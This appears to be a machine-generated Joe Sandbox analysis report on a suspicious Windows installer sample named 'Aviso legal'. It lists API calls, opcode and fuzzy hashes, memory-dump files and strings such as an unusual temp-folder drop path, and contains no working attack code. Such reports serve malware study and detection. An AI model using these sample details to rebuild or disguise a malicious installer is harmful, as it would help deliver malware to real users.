                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,75E03420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                • String ID: A$C:\Users\user\AppData\Local\Temp\geokemi$Call
                                • API String ID: 2624150263-718722730
                                • Opcode ID: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                • Opcode Fuzzy Hash: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                APIs
                                  • Part of subcall function 705B12BB: GlobalAlloc.KERNEL32(00000040,?,705B12DB,?,705B137F,00000019,705B11CA,-000000A0), ref: 705B12C5
                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 705B1D2D
                                • lstrcpyW.KERNEL32(00000008,?), ref: 705B1D75
                                • lstrcpyW.KERNEL32(00000808,?), ref: 705B1D7F
                                • GlobalFree.KERNEL32(00000000), ref: 705B1D92
                                • GlobalFree.KERNEL32(?), ref: 705B1E74
                                • GlobalFree.KERNEL32(?), ref: 705B1E79
                                • GlobalFree.KERNEL32(?), ref: 705B1E7E
                                • GlobalFree.KERNEL32(00000000), ref: 705B2068
                                • lstrcpyW.KERNEL32(?,?), ref: 705B2222
                                • GetModuleHandleW.KERNEL32(00000008), ref: 705B22A1
                                • LoadLibraryW.KERNEL32(00000008), ref: 705B22B2
                                • GetProcAddress.KERNEL32(?,?), ref: 705B230C
                                • lstrlenW.KERNEL32(00000808), ref: 705B2326
                                Memory Dump Source
                                • Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true
                                • Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd
                                Similarity
                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                • String ID:
                                • API String ID: 245916457-0
                                • Opcode ID: 7f1019c69ceb58a6d9f68530922ed9cd48e303b0ae61fb405d075f55a548b474
                                • Instruction ID: 81f99ece7d68561a8c0bffb3268ab51d254aaa91fba782957875e5e4ebf15115
                                • Opcode Fuzzy Hash: 7f1019c69ceb58a6d9f68530922ed9cd48e303b0ae61fb405d075f55a548b474
                                • Instruction Fuzzy Hash: C722B271D00249DECB51DFA4C5842EEBFFAFB04305FA0492EE166E6250D778BA81DB64
                                APIs
                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                Strings
                                • C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid, xrefs: 00402269
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID: C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid
                                • API String ID: 542301482-3639820270
                                • Opcode ID: f0c7f0c58da5b2556a219b4126ec8a5e6c03aa9de5f34d462473648d541e39b0
                                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                • Opcode Fuzzy Hash: f0c7f0c58da5b2556a219b4126ec8a5e6c03aa9de5f34d462473648d541e39b0
                                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: 23bc45f7dafbc09bf3d58dfb9668e04a20f74da7ffae18e0ad0b6f577034eb1d
                                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                • Opcode Fuzzy Hash: 23bc45f7dafbc09bf3d58dfb9668e04a20f74da7ffae18e0ad0b6f577034eb1d
                                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                • DeleteObject.GDI32(00000000), ref: 00405000
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                • GlobalFree.KERNEL32(?), ref: 00405340
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                • ShowWindow.USER32(00000000), ref: 004054FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 2564846305-813528018
                                • Opcode ID: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                • Opcode Fuzzy Hash: 8650db15f8eec7f2c7436ff7bc9e6097db9116c58dec0643669c66b6eab2f928
                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                APIs
                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                • GetSysColor.USER32(?), ref: 00404738
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                • lstrlenW.KERNEL32(?), ref: 00404759
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                • SendMessageW.USER32(00000000), ref: 004047DB
                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                • SetCursor.USER32(00000000), ref: 0040485A
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                • SetCursor.USER32(00000000), ref: 00404876
                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                • String ID: Call$N
                                • API String ID: 3103080414-3438112850
                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                APIs
                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                • BeginPaint.USER32(?,?), ref: 00401047
                                • GetClientRect.USER32(?,?), ref: 0040105B
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                • DeleteObject.GDI32(?), ref: 004010ED
                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
